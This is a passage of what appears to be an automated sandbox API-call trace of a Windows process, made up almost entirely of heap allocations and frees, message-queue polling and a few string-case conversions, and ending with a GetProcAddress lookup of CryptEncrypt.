hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0198.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0198.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0198.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0198.704] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.704] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0198.704] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0198.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0198.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0198.704] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0198.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.705] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0198.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0198.705] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0198.705] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0198.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.706] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0198.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0198.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0198.706] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0198.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0198.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0198.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0198.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0198.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0198.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0198.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0198.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0198.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0198.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0198.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0198.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0198.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0198.707] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0198.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1a0 [0198.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0198.708] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0198.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0198.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0198.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0198.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0198.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.708] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0198.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.708] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0198.709] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0198.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34d5708 | out: hHeap=0x25c0000) returned 1 [0198.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0198.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0198.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0198.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0198.712] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0198.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0198.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0198.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0198.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0198.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0198.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0198.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0198.713] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x24aa188, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0198.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0198.714] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0198.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0198.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0198.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0198.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01d0 | out: hHeap=0x25c0000) returned 1 [0198.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0198.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0198.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01b0 | out: hHeap=0x25c0000) returned 1 [0198.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) 